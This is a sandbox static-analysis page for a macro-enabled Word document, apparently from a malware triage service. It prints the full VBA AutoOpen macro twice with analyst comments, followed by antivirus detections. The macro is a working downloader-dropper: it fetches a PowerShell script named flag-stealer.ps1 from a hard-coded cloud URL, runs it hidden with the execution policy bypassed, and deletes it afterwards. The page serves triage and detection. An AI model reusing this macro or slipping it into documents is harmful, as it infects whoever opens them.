Static | ZeroBOX

Original


                                        Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Analyst summary: macro downloader / dropper.
' AutoOpen is one of Word's automatic macro names, so this body runs when the
' document is opened with macros enabled. It fetches a PowerShell script from a
' hard-coded URL, writes it to %TEMP%, launches it in a hidden window with the
' execution policy bypassed, waits about five seconds and then deletes the file.
' Triage pointers taken from the code below: an Office process issuing an
' outbound HTTPS GET, a .ps1 file created under %TEMP%, and powershell.exe
' started from Word with "-ExecutionPolicy Bypass -WindowStyle Hidden -File".
' Blocking macros in documents from the internet, or the attack surface
' reduction rule that stops Office applications from creating child processes,
' interrupts this chain before the script runs.
Sub AutoOpen()
    Dim strUrl As String
    Dim strFilePath As String
    Dim objXMLHttp As Object
    Dim objStream As Object
    Dim objShell As Object
    Dim objFile As Object
    
    ' Network and file indicators: the remote script URL and the drop path
    ' (%TEMP%\downloaded_script.ps1). Both are hard-coded, so they are usable
    ' as IoCs as they stand.
    strUrl = "https://free-games-ua.s3.eu-central-1.amazonaws.com/flag-stealer.ps1"
    strFilePath = Environ("TEMP") & "\downloaded_script.ps1"

    ' Synchronous GET (third argument False = not async): Send blocks until the
    ' response has arrived. The request is made from inside the Word process.
    Set objXMLHttp = CreateObject("MSXML2.XMLHTTP")
    objXMLHttp.Open "GET", strUrl, False
    objXMLHttp.Send
    
    ' Shows the HTTP status in a dialog, so the macro is visible to the user.
    ' NOTE(review): together with the script name this looks like a test or
    ' exercise sample rather than a stealthy one; the page does not confirm it.
    MsgBox "Status: " & objXMLHttp.Status

    If objXMLHttp.Status = 200 Then
        ' Despite the variable name objStream above, no ADODB.Stream is used:
        ' the body is written as text via Scripting.FileSystemObject, and the
        ' second argument True overwrites an existing file at that path.
        ' objFileSystem is never declared with Dim; that only works when the
        ' module has no Option Explicit (none is visible in this listing).
        Set objFileSystem = CreateObject("Scripting.FileSystemObject")
        Set objFile = objFileSystem.CreateTextFile(strFilePath, True)
        objFile.Write objXMLHttp.responseText
        objFile.Close

        ' Child process of Word: powershell.exe with the execution policy
        ' bypassed. Window style 0 hides the window; the final False means Run
        ' returns immediately without waiting for the script to exit.
        Set objShell = CreateObject("WScript.Shell")
        objShell.Run "powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -File """ & strFilePath & """", 0, False
        
        ' Fixed five-second delay, not a real wait on the process: the loop
        ' only polls the clock and yields with DoEvents.
        Dim pauseTime As Date
        pauseTime = Now + TimeValue("00:00:05")
        Do While Now < pauseTime
            DoEvents
        Loop
        
        ' Anti-forensics: removes the dropped script. Errors are suppressed, so
        ' a failed delete (for example the file still being in use) is silent.
        ' Do not expect the .ps1 on disk afterwards; rely on process-creation,
        ' PowerShell script block and proxy/DNS logs instead.
        On Error Resume Next
        Kill strFilePath
        On Error GoTo 0
    Else
        ' Any status other than 200 is reported to the user; nothing is
        ' written or executed on this path.
        MsgBox "Download failed. HTTP Status: " & objXMLHttp.Status
    End If
    
    ' objStream is never assigned, so clearing it has no effect; objFile and
    ' objFileSystem are not released here.
    Set objXMLHttp = Nothing
    Set objStream = Nothing
    Set objShell = Nothing
End Sub

                                    

Deobfuscated


                                        Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Analyst summary: this "Deobfuscated" listing matches the "Original" listing
' statement for statement, i.e. the macro carries no obfuscation and every
' string below is a plain literal.
' AutoOpen is one of Word's automatic macro names, so the body runs when the
' document is opened with macros enabled. It downloads a PowerShell script,
' drops it in %TEMP%, runs it hidden with the execution policy bypassed, then
' deletes it after a fixed delay.
Sub AutoOpen()
    Dim strUrl As String
    Dim strFilePath As String
    Dim objXMLHttp As Object
    Dim objStream As Object
    Dim objShell As Object
    Dim objFile As Object
    
    ' Hard-coded indicators: download URL and drop path
    ' (%TEMP%\downloaded_script.ps1).
    strUrl = "https://free-games-ua.s3.eu-central-1.amazonaws.com/flag-stealer.ps1"
    strFilePath = Environ("TEMP") & "\downloaded_script.ps1"

    ' Blocking HTTP GET issued from the Word process (async flag is False).
    Set objXMLHttp = CreateObject("MSXML2.XMLHTTP")
    objXMLHttp.Open "GET", strUrl, False
    objXMLHttp.Send
    
    ' User-visible dialog with the HTTP status code.
    MsgBox "Status: " & objXMLHttp.Status

    If objXMLHttp.Status = 200 Then
        ' The file is written with Scripting.FileSystemObject, not ADODB.Stream;
        ' CreateTextFile's True argument overwrites an existing file.
        ' objFileSystem has no Dim statement, which compiles only without
        ' Option Explicit (not visible in this listing).
        Set objFileSystem = CreateObject("Scripting.FileSystemObject")
        Set objFile = objFileSystem.CreateTextFile(strFilePath, True)
        objFile.Write objXMLHttp.responseText
        objFile.Close

        ' Detection point: Word spawning powershell.exe with
        ' "-ExecutionPolicy Bypass -WindowStyle Hidden -File <path in %TEMP%>".
        ' Run is called with window style 0 (hidden) and without waiting.
        Set objShell = CreateObject("WScript.Shell")
        objShell.Run "powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -File """ & strFilePath & """", 0, False
        
        ' Clock-polling delay of five seconds; it does not track whether the
        ' PowerShell process has actually exited.
        Dim pauseTime As Date
        pauseTime = Now + TimeValue("00:00:05")
        Do While Now < pauseTime
            DoEvents
        Loop
        
        ' Deletes the dropped script with errors suppressed, so the payload is
        ' normally gone from disk by the time the host is examined.
        On Error Resume Next
        Kill strFilePath
        On Error GoTo 0
    Else
        ' Non-200 response: only a dialog is shown, nothing is dropped or run.
        MsgBox "Download failed. HTTP Status: " & objXMLHttp.Status
    End If
    
    ' objStream was never set; objFile and objFileSystem are left unreleased.
    Set objXMLHttp = Nothing
    Set objStream = Nothing
    Set objShell = Nothing
End Sub

                                    
[Content_Types].xml
/L[E'9
_rels/.rels
word/document.xml
dpgxRhz
[.ksDr
word/_rels/document.xml.rels
X=c+(\
word/vbaProject.bin
`R^-&?
/&qoL1
L:iG:
5TCCA`
4Yi:(h
@&WSI+
@|8~G:
Q41LV.
ylVf~h
|r'-mo
X8\h^PW(
vv5oKgo
word/theme/theme1.xml
J52$4v
oY^Wq=O
J}\e*H
word/_rels/vbaProject.bin.relsl
-\Ya;>>
word/vbaData.xml
:b!#Fg
word/settings.xml
%bOM=JiY#A
|ZP!hyw
K&;{6,
i#.t%&
word/styles.xml
)0*?S`T~
#'7Jg]
J5.[rS
J5.[rS
g.qcg!
word/webSettings.xml
:5Kc5Y
word/fontTable.xml
I2eC}l
docProps/core.xml
$[W~=i
docProps/app.xml
b*`?`BU8
[Content_Types].xmlPK
_rels/.relsPK
word/document.xmlPK
word/_rels/document.xml.relsPK
word/vbaProject.binPK
word/theme/theme1.xmlPK
word/_rels/vbaProject.bin.relsPK
word/vbaData.xmlPK
word/settings.xmlPK
word/styles.xmlPK
word/webSettings.xmlPK
word/fontTable.xmlPK
docProps/core.xmlPK
docProps/app.xmlPK
Antivirus Signature
Lionic Trojan.MSWord.PwShell.a!c
Elastic malicious (high confidence)
ClamAV Doc.Downloader.Powershell-10002004-0
CMC Clean
CAT-QuickHeal O97M.Dropper.AX
Skyhigh Clean
ALYac Clean
Malwarebytes Clean
Zillya Clean
Sangfor Trojan.Generic-Macro.Save.f2707abd
CrowdStrike Clean
Alibaba TrojanDownloader:Script/modification.4d889f0f
K7GW Clean
K7AntiVirus Clean
huorong OMacro/Downloader.il
Baidu Clean
VirIT W97M/Downloader.AE
Symantec ISB.Dropper!gen1
ESET-NOD32 Clean
TrendMicro-HouseCall TROJ_FRS.0NA104BO25
Avast VBA:Downloader-FDK [Trj]
Cynet Malicious (score: 99)
Kaspersky HEUR:Trojan-Downloader.Script.Generic
BitDefender GT:VB.Heur2.PwShell.2.2BFB8634
NANO-Antivirus Trojan.Ole2.Vbs-heuristic.druvzi
ViRobot DOC.Z.Agent.21731
MicroWorld-eScan GT:VB.Heur2.PwShell.2.2BFB8634
Tencent Heur.Macro.Generic.a.eca8e0c5
Trustlook Clean
Sophos Clean
F-Secure Trojan:W97M/MaliciousMacro.GEN
DrWeb modification of W97M.Suspicious.1
VIPRE GT:VB.Heur2.PwShell.2.2BFB8634
TrendMicro TROJ_FRS.0NA104BO25
CTX docx.downloader.w97m
Emsisoft GT:VB.Heur2.PwShell.2.2BFB8634 (B)
Ikarus GT.Trojan-Downloader.PS.Agent
FireEye GT:VB.Heur2.PwShell.2.2BFB8634
Jiangmin Clean
Webroot Clean
Varist PP97M/Downldr.GC.gen!Eldorado
Avira HEUR/Macro.Downloader.ARIT.Gen
Fortinet VBA/Dloader.FDK!tr
Antiy-AVL Trojan[Downloader]/MSOffice.Agent
Kingsoft Script.Trojan-Downloader.Generic.a
Gridinsoft Clean
Xcitium Clean
Arcabit GT:VB.Heur2.PwShell.2.2BFB8634
SUPERAntiSpyware Clean
Avast-Mobile Clean
Microsoft Clean
Google Highly Suspicious
AhnLab-V3 Clean
Acronis Clean
McAfee Clean
TACHYON Suspicious/WOX.DNL.Gen
VBA32 Clean
Zoner Probably Heur.W97ShellS
Rising Heur.Macro.powershell.a (CLASSIC)
Yandex Clean
SentinelOne Static AI - Malicious OPENXML
MaxSecure Clean
GData GT:VB.Heur2.PwShell.2.2BFB8634
AVG VBA:Downloader-FDK [Trj]
Panda Clean
alibabacloud Trojan[downloader]:MSOffice/Heur2.PrKycQR
No IRMA results available.